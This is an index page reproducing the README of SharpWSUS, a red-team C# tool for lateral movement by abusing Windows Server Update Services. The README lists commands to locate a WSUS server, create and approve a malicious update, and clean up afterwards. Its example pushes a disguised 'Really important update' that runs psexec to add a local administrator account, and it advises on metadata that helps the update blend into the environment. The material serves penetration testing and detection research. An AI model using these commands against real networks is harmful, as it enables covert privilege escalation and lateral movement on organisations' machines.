Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/nettitude/SharpWSUS
Last synced: 3 months ago
- Host: GitHub
- URL: https://github.com/nettitude/SharpWSUS
- Owner: nettitude
- Created: 2022-05-04T08:27:57.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2022-11-20T23:41:40.000Z (almost 2 years ago)
- Last Synced: 2024-05-07T00:35:23.598Z (6 months ago)
- Language: C#
- Size: 17.6 KB
- Stars: 428
- Watchers: 8
- Forks: 72
- Open Issues: 3
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - nettitude/SharpWSUS - (C# #)
README
# SharpWSUS
SharpWSUS is a CSharp tool for lateral movement through WSUS. There is a corresponding blog (https://labs.nettitude.com/blog/introducing-sharpwsus/) which has more detailed information about the tooling, use case and detection.
## Credits
Massive credit to the below resources that really did 90% of this for me. This tool is just an enhancement of the below for C2 reliability and flexibility.
* https://github.com/AlsidOfficial/WSUSpendu - PowerShell tool for abusing WSUS
* https://github.com/ThunderGunExpress/Thunder_Woosus - C# tool for abusing WSUS

## Help Menu
```
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team

Commands listed below have optional parameters in <>.

Locate the WSUS server:
SharpWSUS.exe locate

Inspect the WSUS server, enumerating clients, servers and existing groups:
SharpWSUS.exe inspect

Create an update (NOTE: The payload has to be a windows signed binary):
SharpWSUS.exe create /payload:[File location] /args:[Args for payload]

Approve an update:
SharpWSUS.exe approve /updateid:[UpdateGUID] /computername:[Computer to target]

Check status of an update:
SharpWSUS.exe check /updateid:[UpdateGUID] /computername:[Target FQDN]

Delete update and clean up groups added:
SharpWSUS.exe delete /updateid:[UpdateGUID] /computername:[Target FQDN]
```

## Example Usage
```
sharpwsus locate
sharpwsus inspect
sharpwsus create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user phil Password123! /add && net localgroup administrators phil /add\\"" /title:"Great UpdateC21" /date:2021-10-03 /kb:500123 /rating:Important /description:"Really important update" /url:"https://google.com"
sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"
sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local
sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"
```

## Notes
* The binary has to be Windows signed, so psexec, msiexec, msbuild etc. could be useful for lateral movement.
* The metadata on the create command is not needed, but is useful for blending into the environment.
* If testing in a lab, the first update is usually quick; each subsequent update will take a couple of hours (this is due to how Windows evaluates whether an update is already installed).